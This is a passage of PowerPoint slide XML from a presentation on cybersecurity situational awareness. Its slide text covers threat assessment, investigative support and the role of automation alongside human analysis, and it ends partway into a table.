              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Situational awareness: knowing what’s going on with the environments for which you are responsible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Why important?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Be better prepared for incoming attacks, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>malware, and other security issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strategic threat assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Awareness of your current threat landscape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48131" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4E1E5A-123E-D048-83BB-8C3AF1EDD8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08650" y="4052888"/>
            <a:ext cx="2998788" cy="19986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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8971FE1D-F977-CD40-B5EE-48B38E831D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Situational Awareness Is Foundational </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50178" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5D85987-A1CE-1745-91F1-B1F3261BF70D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="7916862" cy="430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29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1pPr>
            <a:lvl2pPr marL="457200" indent="-455613">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2pPr>
            <a:lvl3pPr marL="804863" indent="-460375">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Organizational, strategic-level risk assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Support for investigative efforts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More quickly spot and triage current attacks and anomalies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="687388" lvl="2" indent="-342900" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Develop more comprehensive preventative measures and remediation processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6898374-2A59-F748-AA11-4599BBC11B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08650" y="4052888"/>
            <a:ext cx="2998788" cy="19986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slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA47AE3B-CE91-B246-897B-76486DDA39ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1479550"/>
            <a:ext cx="8291513" cy="4702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29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1pPr>
            <a:lvl2pPr marL="685800" indent="-227013">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2pPr>
            <a:lvl3pPr indent="-227013">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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Automation is critical but not sufficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Summarize large amounts of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Extract relevant information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Human intelligence is crucial to providing interpretation of automated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Establish conclusions and adjust security position</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Refine your situational awareness scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52226" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{653211BA-5C23-5142-9500-B53180CFA241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="365125"/>
            <a:ext cx="8291513" cy="877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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Features of Successful Situational Awareness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47537BD0-CD7A-BE4C-AE02-D1BAE8605B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Features of Successful Situational Awareness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="33794" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E4A0F6-FFE3-0645-8656-C6F7311E77ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166242708"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="484188" y="1239838"/>
          <a:ext cx="8326437" cy="5007975"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2343150">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1914091762"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5983287">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4248817348"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="630246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Input Data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="007F16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
                        <a:lnSpc>
                          <a:spcPct val="8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pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Improved Results and Speed of </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Resolution Due to Situational Awareness</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61920" marR="68400" marT="74169" marB="45721" horzOverflow="overflow">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lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:solidFill>
                      <a:srgbClr val="007F16"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4003566114"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630246">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPts val="1425"/>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sz="2800">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPts val="1138"/>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sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPts val="850"/>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sz="2000">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Droid Sans Fallback" charset="0"/>
                          <a:cs typeface="Droid Sans Fallback" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPts val="575"/>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4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPts val="288"/>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5pPr>
                      <a:lvl6pPr marL="25146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6pPr>
                      <a:lvl7pPr marL="29718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7pPr>
                      <a:lvl8pPr marL="34290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8pPr>
                      <a:lvl9pPr marL="38862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9pPr>
                    </a:lstStyle>
                    <a:p>
